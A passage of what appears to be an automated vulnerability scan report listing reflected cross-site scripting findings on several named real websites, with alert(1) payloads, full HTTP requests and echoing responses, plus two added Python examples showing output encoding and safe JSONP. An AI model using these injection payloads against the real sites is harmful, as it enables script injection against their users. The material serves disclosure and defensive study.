The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 was submitted in the search parameter. This input was echoed as 44577"><img src=a onerror=alert(1)>4b902301784 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload's leading "> closes the attribute value and its tag, and the img element's onerror event handler then runs the JavaScript without any script tag. As in the previous findings the value is reflected in the title, in the description meta tag and in the src of the iframe that loads banner_120_600_b.php; the keywords meta tag shows only the 44577 prefix, so that sink is not reachable with this payload.

Request

GET /banner_120_600_a.php?search=44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 580


<html>
<head>
<title> 44577"><img src=a onerror=alert(1)>4b902301784 </title>
<meta name="description" content="44577"><img src=a onerror=alert(1)>4b902301784">
<meta name="keywords" content="44577">
...[SNIP]...
<iframe name="I1" src="banner_120_600_b.php?search=44577"><img src=a onerror=alert(1)>4b902301784" marginwidth="1" marginheight="1" height="600" width="160" scrolling="no" border="0" frameborder="0">
...[SNIP]...
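The four banner_120_600_a.php findings above all come down to one defect: the search value is interpolated into a text node and into double-quoted attribute values without entity encoding. The following is an added example, not code from the report or from the site; the TEMPLATE is a hypothetical reconstruction in the shape of the response shown above (the PHP source is not on the page), and the PAYLOAD is the marker from finding 5.45. It shows the vulnerable rendering beside the encoded one, and a small context classifier of the kind a scanner uses to decide that a payload "echoed unmodified" in a double-quoted attribute is exploitable while an entity-encoded echo is not. The classifier also handles the single-quoted attribute case that appears in the nextadvisor.com findings later on this page.

```python
import html

# Marker payload in the report's style (random prefix, breakout, random suffix),
# copied from finding 5.45 above.
PAYLOAD = '44577"><img src=a onerror=alert(1)>4b902301784'

# Constructed template in the shape of the banner_120_600_a.php response shown
# above. Hypothetical: the page does not show the server-side source.
TEMPLATE = ('<html><head>\n'
            '<title> {search} </title>\n'
            '<meta name="description" content="{search}">\n'
            '</head><body>\n'
            '<iframe name="I1" src="banner_120_600_b.php?search={search}"'
            ' height="600" width="160"></iframe>\n'
            '</body></html>')


def render_unsafe(search: str) -> str:
    """Interpolate the raw parameter, as the vulnerable banner does."""
    return TEMPLATE.replace('{search}', search)


def render_safe(search: str) -> str:
    """Entity-encode & < > " ' before interpolation. That one step covers both
    sinks this template uses: a text node and a double-quoted attribute.
    (It is not sufficient for a URL, JavaScript or unquoted-attribute sink.)"""
    return TEMPLATE.replace('{search}', html.escape(search, quote=True))


def classify_context(body: str, pos: int) -> str:
    """Return the HTML context at offset pos of body: 'text', 'attr_dquote',
    'attr_squote', or 'tag' (inside a tag but outside any quoted value).
    Deliberately simple: it ignores comments and raw-text elements such as
    script and style."""
    before = body[:pos]
    last_lt, last_gt = before.rfind('<'), before.rfind('>')
    if last_lt <= last_gt:                 # the last tag was closed: text node
        return 'text'
    tag_so_far = before[last_lt:]          # from the unclosed '<' up to pos
    if tag_so_far.count('"') % 2 == 1:
        return 'attr_dquote'
    if tag_so_far.count("'") % 2 == 1:
        return 'attr_squote'
    return 'tag'


def find_reflections(body: str, payload: str) -> list:
    """Every byte-for-byte echo of payload, with its context. This is the
    report's 'echoed unmodified' test; an entity-encoded echo is not found."""
    hits, start = [], 0
    while (pos := body.find(payload, start)) != -1:
        hits.append((pos, classify_context(body, pos)))
        start = pos + len(payload)
    return hits


def is_exploitable(body: str, payload: str) -> bool:
    """True if a raw reflection lands where this payload's breakout works:
    a text node, or an attribute quoted with the same quote the payload uses."""
    quote_ctx = 'attr_dquote' if '"' in payload else 'attr_squote'
    return any(ctx in ('text', quote_ctx)
               for _, ctx in find_reflections(body, payload))


if __name__ == '__main__':
    for name, page in (('unsafe', render_unsafe(PAYLOAD)),
                       ('safe', render_safe(PAYLOAD))):
        contexts = [ctx for _, ctx in find_reflections(page, PAYLOAD)]
        print(name, contexts,
              'exploitable' if is_exploitable(page, PAYLOAD) else 'not exploitable')
```

Run as a script it reports three raw reflections for the unsafe rendering (one text node, two double-quoted attributes) and none for the encoded one. Note that html.escape is the right primitive only for the two contexts this template has; the iframe src is also a URL, and if the value were ever placed unquoted or inside JavaScript a different encoder would be needed.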

5.46. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the response body. The payload e685f<script>alert(1)</script>8d158132c29 was submitted in the url parameter and was echoed unmodified in the application's response.

Treat this finding with caution before accepting the High rating. The response is not an HTML document: it is served as application/json and consists of a JSONP call, __DBW.collectDiggs({...}), in which the reflected value sits inside a double-quoted JavaScript string literal. A script tag inside a string literal does not execute, and a browser given this Content-Type will not render the body as HTML, so the payload shown does not by itself run JavaScript. What the echo does establish is that the endpoint applies no HTML or JavaScript escaping to the url parameter. Whether a payload containing a double quote (which this probe did not include) can terminate the string literal, and how the response behaves in older browsers that sniff content types, are separate questions that this request does not answer.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.htmle685f<script>alert(1)</script>8d158132c29 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 24 Apr 2011 04:06:47 GMT
Via: NS-CACHE: 100
Etag: "9132285711f22c48b2e96cbecb65472c685386d9"
Content-Length: 213
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 24 Apr 2011 04:16:46 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.htmle685f<script>alert(1)</script>8d158132c29", "diggs": 0});
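The digg widget response above is a JSONP callback, so the practical questions are whether the reflected string can terminate the JavaScript string literal and whether the bytes < and > reach a script context unescaped. The following is an added example and not the widget's code (its real implementation is not shown on the page): jsonp_unsafe is a hypothetical reconstruction of plain string concatenation in the shape of the response, and jsonp_safe shows the hardened form, which validates the callback name, serialises with a real JSON encoder and then replaces the characters that matter in a script context with \u escapes that are valid in both JSON and JavaScript. The PAYLOAD is the marker from finding 5.46.

```python
import json
import re

# Strict callback grammar: a dotted JavaScript identifier path and nothing else.
CALLBACK_RE = re.compile(r'^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$')

# Constructed sample, copied from finding 5.46 above.
PAYLOAD = 'e685f<script>alert(1)</script>8d158132c29'


def jsonp_unsafe(callback: str, url: str, diggs: int) -> str:
    """String concatenation in the shape of the widget's output.
    Hypothetical: the widget's real code is not shown on the page."""
    return '%s({"url": "%s", "diggs": %d});' % (callback, url, diggs)


def jsonp_safe(callback: str, url: str, diggs: int) -> str:
    """Serialise with a JSON encoder, then make the JSON safe to embed in a
    script context. Serve it with Content-Type: application/javascript and
    X-Content-Type-Options: nosniff."""
    if not CALLBACK_RE.match(callback):
        raise ValueError('callback is not a plain identifier path')
    body = json.dumps({'url': url, 'diggs': diggs})   # escapes " and \
    # json.dumps leaves < > & and U+2028/2029 alone. \uXXXX escapes are valid
    # in both JSON and JavaScript string literals, and they remove the bytes
    # that could close a script element or inject a JS line terminator.
    for ch, esc in (('<', '\\u003c'), ('>', '\\u003e'), ('&', '\\u0026'),
                    ('\u2028', '\\u2028'), ('\u2029', '\\u2029')):
        body = body.replace(ch, esc)
    # A fixed comment prefix means the response never starts with
    # attacker-chosen bytes, which some content sniffers key on.
    return '/**/%s(%s);' % (callback, body)


def parse_jsonp(text: str):
    """Strip the callback wrapper and decode the JSON argument, to show that
    the safe output still round-trips the original value."""
    m = re.match(r'^(?:/\*\*/)?([\w$.]+)\((.*)\);$', text, re.S)
    if not m:
        raise ValueError('not a JSONP response')
    return m.group(1), json.loads(m.group(2))


def script_breakout(text: str) -> bool:
    """Does the body contain a literal <script> or </script> sequence, i.e.
    bytes an HTML parser would act on if this text were ever treated as HTML?"""
    lowered = text.lower()
    return '<script>' in lowered or '</script>' in lowered


if __name__ == '__main__':
    print(jsonp_unsafe('__DBW.collectDiggs', PAYLOAD, 0))
    print(jsonp_safe('__DBW.collectDiggs', PAYLOAD, 0))
```

The unsafe form reproduces the response in the report. The safe form emits the same callback and the same logical value, but the decoded url is recovered only by a JSON or JavaScript parser, never by an HTML parser, and a double quote in the input cannot end the string literal.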

5.47. http://www.dictof.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe6d1<script>alert(1)</script>99e6fce44cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The 404 status does not prevent exploitation: the error page is served as text/html;charset=UTF-8 and echoes the requested path inside a p element, so a browser that follows a crafted link renders the injected script tag.

Request

GET /favicon.icofe6d1<script>alert(1)</script>99e6fce44cd HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FC101987E2340D1CA7E9F5BBE7019BA1.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; CAMPAIGNE.ENTRY_DATE_COOKIE=1303648014948; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=121015709.328301938.1303648022.1303648022.1303648022.1; __utmc=121015709; __utmb=121015709.1.10.1303648022; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=262432266.188043035.1303648022.1303648022.1303648022.1; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303648022

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 24 Apr 2011 12:45:23 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: lc=en; Path=/
Content-Language: en
Content-Length: 3651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<p>The page - /favicon.icofe6d1<script>alert(1)</script>99e6fce44cd - does not exist.</p>
...[SNIP]...

5.48. http://www.lifelock.com/offers/faces/female/ [promocodehide parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

The value of the promocodehide request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e556"><script>alert(1)</script>7f71559fd29 was submitted in the promocodehide parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the href of the enrol link to https://secure.lifelock.com/enrollment, into which promocodehide is copied unencoded; the payload's "> terminates that attribute value and the a tag before the script tag.

Request

GET /offers/faces/female/?promocodehide=ADCONIONRT7e556"><script>alert(1)</script>7f71559fd29&c3metrics=adcon HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_...[SNIP]...--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_...[SNIP]...--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:33:18 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; path=/
Set-Cookie: TSceba2f=5aaeac0c062f3d8d72230cba15c93f6fb9ed150244c2657c4db4188e; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocodehide=ADCONIONRT7e556"><script>alert(1)</script>7f71559fd29" class="enroll-now">
...[SNIP]...

5.49. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6492a"><script>alert(1)</script>31358a97f04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the href of the rel="canonical" link element in the document head, which is built from the requested path; the 404 status is irrelevant because the body is served as text/html.

Request

GET /favicon.ico6492a"><script>alert(1)</script>31358a97f04 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:18:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/favicon.ico6492a"><script>alert(1)</script>31358a97f04" />
...[SNIP]...

5.50. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f416"><script>alert(1)</script>4731f60ad3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The sink is again the href of the rel="canonical" link element, which is assembled from the requested path (with .php appended) rather than from a fixed value, so every path segment reaches it.

Note that a redirection occurred between the attack request and the response containing the echoed input. The attack succeeds only if that redirection is followed, which a browser does automatically.

Request

GET /images4f416"><script>alert(1)</script>4731f60ad3c/blog_sidebar/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:11:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=bb25406075fc65fe23fc9018b416cc04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images4f416"><script>alert(1)</script>4731f60ad3c/blog_sidebar/internet_fax_sb.jpg.php" />
...[SNIP]...

5.51. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89eaf"><script>alert(1)</script>c76e2d7db84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar89eaf"><script>alert(1)</script>c76e2d7db84/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:12:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=4188008f9f9154f752a18764b6f09d95; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar89eaf"><script>alert(1)</script>c76e2d7db84/internet_fax_sb.jpg.php" />
...[SNIP]...

5.52. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1ab'><img%20src%3da%20onerror%3dalert(1)>b4f6c6a7ca7 was submitted in the REST URL parameter 2. This input was echoed as 8d1ab'><img src=a onerror=alert(1)>b4f6c6a7ca7 in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Unlike the previous finding on the same path segment, the sink here is a navigation link whose href is enclosed in single quotes, so the payload uses a single quote to close the attribute value and the a tag, and an img element's onerror event handler then runs the JavaScript without any script tag.

Note that a redirection occurred between the attack request and the response containing the echoed input. The attack succeeds only if that redirection is followed, which a browser does automatically.

Request

GET /images/blog_sidebar8d1ab'><img%20src%3da%20onerror%3dalert(1)>b4f6c6a7ca7/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:13:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=80851d8767d529f822b1adcb94be86b8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/blog_sidebar8d1ab'><img src=a onerror=alert(1)>b4f6c6a7ca7/index.php' class='nav_select'>
...[SNIP]...

5.53. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d368"><script>alert(1)</script>a121883116c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar/internet_fax_sb.jpg8d368"><script>alert(1)</script>a121883116c HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:14:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=9b2c0adab769e7435ca716e85fa328da; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 22396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg8d368"><script>alert(1)</script>a121883116c.php" />
...[SNIP]...

5.54. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312bd"><script>alert(1)</script>b453ad10c5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images312bd"><script>alert(1)</script>b453ad10c5a/blog_sidebar/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:11:16 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=0b2d5ef5edf6176ddbb7555b33b8cff1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 23652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/images312bd"><script>alert(1)</script>b453ad10c5a/blog_sidebar/online_dating_sb.jpg.php" />
...[SNIP]...

5.55. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79021"><script>alert(1)</script>982aa0608fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/blog_sidebar79021"><script>alert(1)</script>982aa0608fe/online_dating_sb.jpg HTTP/1.1
